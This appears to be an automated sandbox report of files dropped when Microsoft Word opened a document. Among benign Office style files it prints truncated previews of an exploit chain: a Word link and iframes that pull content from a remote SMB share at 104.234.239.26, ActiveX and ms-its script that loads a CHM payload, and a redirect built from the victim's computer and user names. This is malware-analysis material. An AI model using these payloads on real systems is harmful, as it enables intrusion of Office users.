                                                                                                                                          SHA-512:70DC3B45B8FF83D721CCA73C68E7543D48C94654E8AEF6F42522C7C36B8F64CEDD1C966D480DDB9E050E9EB2E5492A2538B74BE9982488E33C556E210734820B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:X.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.o.f.f.i.c.e./.w.o.r.d./.2.0.0.3./.w.o.r.d.m.l.2.4.5.0.......).(.).(.).(.).(.).(.). .....W.o.r.d...D.o.c.u.m.e.n.t...8.=. . ......... .\.a. .\.t. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".\.\.\.\.1.0.4...2.3.4...2.3.9...2.6.\.\.s.h.a.r.e.1.\.\.M.S.H.T.M.L._.C.7.\.\.f.i.l.e.0.0.1...u.r.l.". .".".L.I.N.K.x.m.l.f.i.l.e.{.0.0.0.0.0.3.0.0.-.0.0.0.0.-.0.0.0.0.-.C.0.0.0.-.0.0.0.0.0.0.0.0.0.0.4.6.}.=. . ......... .\.a. .\.t. .h.t.m.l.f.i.l.e.......................................................................b.......................................................................................................................................................................................................................................................................................................................j....OJ..QJ..U..mH..sH...5..OJ..QJ..mH..sH...OJ..QJ..mH..sH.....h.1l.OJ..QJ..mH..sH.....h.1l.5..OJ..QJ..\..mH..sH... CJ..OJ..Q

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\zip_k3[1].htm

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):66
                                                                                                                                          Entropy (8bit):1.2628822391789147
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:qVUNNU7Gb:qANkGb
                                                                                                                                          MD5:67DA67C9F53B8197E4CD48329718FC28
                                                                                                                                          SHA1:8036D0AC286D0A8EFD6155BDA9F4A3C5D153CD77
                                                                                                                                          SHA-256:C1A23DC7A8466911BF4B7478098D9410CFFD114E6A17CF573900B3973FA69EBA
                                                                                                                                          SHA-512:427F3369978F7F2F7244EDD94CC66B0DD87C002F3A7345EC7088AD5D7726EB0EE088AC13381EC9CBDBCA99A01A77871D3A37FE5C31FA5EBE10E3AD8E9887E08B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html>11111111111111111111111111111111111111111111111111111</html>

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\start[1].xml

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):576
                                                                                                                                          Entropy (8bit):5.325609436459455
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:MMHdjR9JoTIB99bx4Wh9abdcs/NSmDXuM8nKhoZM1GMGw:JdjR9JoUnJx4WvID9DXuMkM7P
                                                                                                                                          MD5:0C72B2479316B12073D26C6ED74D3BDC
                                                                                                                                          SHA1:D46E2B72890C180C33648326BD37F59BA77291C4
                                                                                                                                          SHA-256:48142DC7FE28A5D8A849FFF11CB8206912E8382314A2F05E72ABAD0978B27E90
                                                                                                                                          SHA-512:E81982B81AD20CDC2402C6C80041BEA83773E6B5D30ABAA50F5E9EE11E5278F4A032BDBAEC34968BD03AAD0770D101B98A88408F9DFD8483F45FC0BDC2EBA90D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<?xml-stylesheet type='text/xsl' href='#'?>....<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl" xmlns:xslt="http://www.w3.org/1999/XSL/Transform" result-ns="">..<xsl:template match="/">....<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="X-UA-Compatible" content="IE=7"/>..</head>....<body>......<iframe src='RFile.asp' width='800' height='800'></iframe>..<script defer=''>....lt=String.fromCharCode(60);..gt=String.fromCharCode(62);....</script>....</body>..</html>....</xsl:template>..</xsl:stylesheet>

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\zip_k2[1].htm

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):66
                                                                                                                                          Entropy (8bit):1.2628822391789147
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:qVUNNU7Gb:qANkGb
                                                                                                                                          MD5:67DA67C9F53B8197E4CD48329718FC28
                                                                                                                                          SHA1:8036D0AC286D0A8EFD6155BDA9F4A3C5D153CD77
                                                                                                                                          SHA-256:C1A23DC7A8466911BF4B7478098D9410CFFD114E6A17CF573900B3973FA69EBA
                                                                                                                                          SHA-512:427F3369978F7F2F7244EDD94CC66B0DD87C002F3A7345EC7088AD5D7726EB0EE088AC13381EC9CBDBCA99A01A77871D3A37FE5C31FA5EBE10E3AD8E9887E08B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html>11111111111111111111111111111111111111111111111111111</html>

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\RFile[1].htm

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):292
                                                                                                                                          Entropy (8bit):5.373055167434458
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:qzAosxNRQB8BGQjW8rLoW1Yp1BXCQBGQjW8rZhTYwigSeTvOI:kADtBGr8QW1UBXCQBGr8kyOI
                                                                                                                                          MD5:A9ECB696E3FAED1BAB7D2A427D6CFB5C
                                                                                                                                          SHA1:56304A51EC454C0F4D0BE931B1777C268821CE8E
                                                                                                                                          SHA-256:79748768C69F4B08F3E1A8471C934307155CA79FE442CFA358E4EB9E2BF213B2
                                                                                                                                          SHA-512:63816F9E956EC7074881AB7B27578EDB2D7645B1F051A1E7BECE095312F510007BB8323088D55CBE0AF268341C0E0BE2920032ACF3868C7C00C8EEE78828E4B7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html><body onload=setTimeout('fx()',30000)><iframe src=file://104.234.239.26/share1/MSHTML_C7></iframe><script>function fx() { document.body.innerHTML='<iframe src=file://104.234.239.26/share1/MSHTML_C7/1/84.17.52.5_4f657_file001.htm?d=84.17.52.5_4f657_></iframe>'; } </script></body></html>

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\zip_k[1].htm

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):66
                                                                                                                                          Entropy (8bit):1.2628822391789147
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:qVUNNU7Gb:qANkGb
                                                                                                                                          MD5:67DA67C9F53B8197E4CD48329718FC28
                                                                                                                                          SHA1:8036D0AC286D0A8EFD6155BDA9F4A3C5D153CD77
                                                                                                                                          SHA-256:C1A23DC7A8466911BF4B7478098D9410CFFD114E6A17CF573900B3973FA69EBA
                                                                                                                                          SHA-512:427F3369978F7F2F7244EDD94CC66B0DD87C002F3A7345EC7088AD5D7726EB0EE088AC13381EC9CBDBCA99A01A77871D3A37FE5C31FA5EBE10E3AD8E9887E08B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html>11111111111111111111111111111111111111111111111111111</html>

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Temp1_84.17.52.5_4f657_file001.zip\1111.htm

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1272
                                                                                                                                          Entropy (8bit):5.520959394979567
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:k5kBmPTEuPkuIuGdENZIGdE4RRS5t9pmETDgnfAJ4j3HSrz:WkBWEucFuGdENeGdE4e5iy4j3yv
                                                                                                                                          MD5:E65A1828D6AFE3F27B4EC7EC1A2FEE20
                                                                                                                                          SHA1:18C1F21D8AABAAD6EDF1D5DA5ACAA9A4CA3C6D67
                                                                                                                                          SHA-256:F08CC922C5DAB73F6A2534F8CEEC8525604814AE7541688B7F65AC9924ACE855
                                                                                                                                          SHA-512:5FC4C3FCA5606FB6B12A2C73C788BE9B8ED26674E7AB7CED6D0C669A578055DE41942C38F75805D9DD860307C177C8C828FA0E2B2334CE4BEFDD6D12BF365E28
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html><body><div id=d1></div>..<script defer>....loc=location.href.toLowerCase();....qs=loc.indexOf('?');....lb = loc.lastIndexOf('/');......if (loc.indexOf('?wb') == -1) {......if (qs == -1)..{..loc2 = loc;..}....else {..loc2=loc.substring(0,qs);..}....loc2=loc2 + '?wb=1';......p=createPopup();..p.show(0,0,1,1);....p.document.write('<object id=wb classid=clsid:8856F961-340A-11D0-A96B-00C04FD705A2><param name=Location value=' + loc2 + '></object>');..}....else {......dl = loc.indexOf('c:');....shb = loc.indexOf('c$');......if (dl != -1) {....loc2 = loc.substring(dl,lb+1);....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......if (shb != -1) {....loc2 = loc.substring(shb,lb+1);....loc2 = loc2.replace('c$','c:');....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......document.getElementById('d1').innerHTML='<OBJECT id=h2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 width=40% height=40%><PARAM name="Command" value="related topics,MENU"><param name=button value=text:x><pa

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Temp1_84.17.52.5_4f657_file001.zip\1111.txt

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1272
                                                                                                                                          Entropy (8bit):5.520959394979567
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:k5kBmPTEuPkuIuGdENZIGdE4RRS5t9pmETDgnfAJ4j3HSrz:WkBWEucFuGdENeGdE4e5iy4j3yv
                                                                                                                                          MD5:E65A1828D6AFE3F27B4EC7EC1A2FEE20
                                                                                                                                          SHA1:18C1F21D8AABAAD6EDF1D5DA5ACAA9A4CA3C6D67
                                                                                                                                          SHA-256:F08CC922C5DAB73F6A2534F8CEEC8525604814AE7541688B7F65AC9924ACE855
                                                                                                                                          SHA-512:5FC4C3FCA5606FB6B12A2C73C788BE9B8ED26674E7AB7CED6D0C669A578055DE41942C38F75805D9DD860307C177C8C828FA0E2B2334CE4BEFDD6D12BF365E28
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html><body><div id=d1></div>..<script defer>....loc=location.href.toLowerCase();....qs=loc.indexOf('?');....lb = loc.lastIndexOf('/');......if (loc.indexOf('?wb') == -1) {......if (qs == -1)..{..loc2 = loc;..}....else {..loc2=loc.substring(0,qs);..}....loc2=loc2 + '?wb=1';......p=createPopup();..p.show(0,0,1,1);....p.document.write('<object id=wb classid=clsid:8856F961-340A-11D0-A96B-00C04FD705A2><param name=Location value=' + loc2 + '></object>');..}....else {......dl = loc.indexOf('c:');....shb = loc.indexOf('c$');......if (dl != -1) {....loc2 = loc.substring(dl,lb+1);....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......if (shb != -1) {....loc2 = loc.substring(shb,lb+1);....loc2 = loc2.replace('c$','c:');....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......document.getElementById('d1').innerHTML='<OBJECT id=h2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 width=40% height=40%><PARAM name="Command" value="related topics,MENU"><param name=button value=text:x><pa

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Temp1_84.17.52.5_4f657_file001.zip\1111.txt:Zone.Identifier

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):104
                                                                                                                                          Entropy (8bit):5.0421562142480365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:gAWY33AtwXJY55UPGjW88cLupAidtqTQJTRy:qY33Atj55eGjW88ndQTYRy
                                                                                                                                          MD5:578F684585A2CCED6D1CC00D19ADAA22
                                                                                                                                          SHA1:1959CA1BF0C476ACD67846C8A7FAB0D3A130FDD4
                                                                                                                                          SHA-256:CC74C7456A9AC2A01EA990A0BB786FDA6639B06A4C2A685AA687B70BDE3ECDBD
                                                                                                                                          SHA-512:2C56F81156EDD3B10B8A23674DA515DC0ED44A359CF01F970852770C3CDDE7A7469D43D2C7702A0182A953E0CDCC438D1E66824659B17DF742F4CCC3A03C82D8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[ZoneTransfer]..ZoneId=3..ReferrerUrl=\\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zip..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Temp1_84.17.52.5_4f657_file001.zip\2222.chm

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:MS Windows HtmlHelp Data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):9804
                                                                                                                                          Entropy (8bit):2.1712613498501137
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:nELgCqt0jQRlEFlErlElj5sINU7izQOeAJR3K2fnLWOsZeaQ2:niKe2WreArLWOBaQ
                                                                                                                                          MD5:B15FBE43A5C198266D3D881C5366BB93
                                                                                                                                          SHA1:0716F9413712D09D030C2AC9A05A26E157F74E6D
                                                                                                                                          SHA-256:263A664BB497A1752A2FDDC54B90313115CA358022DC1AD9C0A3C183DC454B58
                                                                                                                                          SHA-512:3707FA283F804454350427374A7BC5904FBF61939209C07301B89C2F4822FE0EFFAE41044C34FB15278E34EA4AF765E20DD92E19E6A7B6B02CFB8212BC909F24
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:ITSF....`.........CH.......|.{.......".....|.{......."..`...............x.......T.......................L&..............ITSP....T...........................................j..].!......."..T...............PMGLy................/..../#IDXHDR..#.../#ITBITS..../#STRINGS...../#SYSTEM....../#TOPICS..#0./#URLSTR..w7./#URLTBL..S$./#WINDOWS..W.L./file1.htm...T./file1.mht..n.w./fileH.htm..e.T./fileH.mht..9.x./img.bmp..1.&./INDEX.htm....::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content....H,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompressed/SpanInfo.b./::DataSpace/Storage/MSCompressed/Transform/List.<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable..P0.....................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\dat922F.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):849
                                                                                                                                          Entropy (8bit):5.123459746741447
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:MYc7ABNMOy4e2EvOJKF3sBGk5clvS5SrO9Dgoa8xI7l4peNxjJWdqkDstob:MPkBNrCk28i7SgNxVystob
                                                                                                                                          MD5:EBA757C552EFE9683E23F03516828323
                                                                                                                                          SHA1:0184BEBA3AF89BEFEBC09124ECC2C286EB674387
                                                                                                                                          SHA-256:4FC768476EE92230DB5DBC4D8CBCA49A71F8433542E62E093C3AD160F699C98D
                                                                                                                                          SHA-512:3C9071DF38413FDC7E451607C3D685424DFF90423710B6A993B9DC4FC733FADEB628C2E7D8B9073364DEE5E38EA0198F2FA28CBCE0FB355032B2D319B5DC2FBC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.<html>..<script>..loc=location.href.toLowerCase();........d_s = '?d=';..dx = loc.indexOf(d_s);....c_s = '&c=';..cx = loc.indexOf(c_s);....u_s = '&u=';..ux = loc.indexOf(u_s);......if (dx != -1) ....{..d=loc.substring(dx + d_s.length,cx); dir_s = true;..}....else { dir_s = false; }......if (cx != -1)..{..CompName= loc.substring(cx + c_s.length,ux); cn_s = true;..}....else { cn_s = false; }......if (ux != -1)..{..UName= loc.substring(ux + u_s.length,loc.length); usr_s = true;..}....else { usr_s = false; }......if (dir_s == true && cn_s == true && usr_s == true) {..document.write('<meta http-equiv=refresh content="0;URL=file://' + CompName + '/c$/users/' + UName + '/appdata/local/temp/temp1_' + d + 'file001.zip/1111.htm">');..}....else {..document.write('<html>d=' + dir_s + '<br>c=' + cn_s + '<br>u=' + usr_s + '</html>');..}....</script>

                                                                                                                                          C:\Users\user\AppData\Local\Temp\mso6612.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):663
                                                                                                                                          Entropy (8bit):5.949125862393289
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                          MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                          SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                          SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                          SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF0A8A6953608FE47A.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFA4E2912747A4B289.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):333602
                                                                                                                                          Entropy (8bit):4.65455658727993
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:ybW83ob181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:Z
                                                                                                                                          MD5:58AAFDDC9C9FC6A422C6B29E8C4FCCA3
                                                                                                                                          SHA1:1A83A0297FE83D91950B71114F06CE42F4978316
                                                                                                                                          SHA-256:9095FE60C9F5A135DFC22B23082574FBF2F223BD3551E75456F57787ABC5797B
                                                                                                                                          SHA-512:1EBB116BAE9FE02CA942366C8E55D479743ABB549965F4F4302E27A21B28CDF8B75C8730508F045BA4954A5AA0B7EB593EE88226DE3C94BF4E821DBE4513118A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):297017
                                                                                                                                          Entropy (8bit):5.000343845106573
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:GwprAtk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:I
                                                                                                                                          MD5:0D0E65173F5AE6FE524DA09EEDDDCC84
                                                                                                                                          SHA1:C868617C86C1287B35875AE8D943457756B0B338
                                                                                                                                          SHA-256:787D1CBF076902B2568E8CFF1245E5FBEBA6AAD84240A54C4F9957084B93F90D
                                                                                                                                          SHA-512:E2FD5156BA707F6205B5CC52CC4FF8E1CDECB10B6C04E70EC4B3D3D0FA636AB9FDAE77F249D9D303D35CCCA8F8B399B60C602629B8803F708CFDAE8A1122603D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$p

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):268670
                                                                                                                                          Entropy (8bit):5.054376958189988
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:JwprAJiR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N4
                                                                                                                                          MD5:B17C7119B252FD46A675143F80499AA4
                                                                                                                                          SHA1:4445782BEC229727EE6F384EC29E0CBA82C25D22
                                                                                                                                          SHA-256:8535282A6E53FA4F307375BCEE99DD073A4E2E04FAF8841E51E1AA0EE351A670
                                                                                                                                          SHA-512:F9FB76A662DC6AB8DE22B87E817B4BAAC1AEEE08BA4F5090E6BC3060F42BC7CD15A71EB5B117554AEB395B22E5C2EEA7D0EFC36FF13BEC13B156879B87641505
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):256358
                                                                                                                                          Entropy (8bit):5.104453150382283
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:gwprAB795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:BW
                                                                                                                                          MD5:4C7ECD0ED5ADCC30352E2C06931D290A
                                                                                                                                          SHA1:0E6A8E0EDDB5E67E26CF15692D1E8591F3D3D1DE
                                                                                                                                          SHA-256:40BACD32DB58799FA95B4707588ADEA1C9065CD804712B69B55DDD332C037D4E
                                                                                                                                          SHA-512:2C25363DCCDB718D427CE451963F1616344A59A57AF0A19F946B7C06536E773E0EA383AC48AAC35E109327B7B86432D608CB0490EBF9590A31AA87330D6F929B
                                                                                                                                          Malicious:false
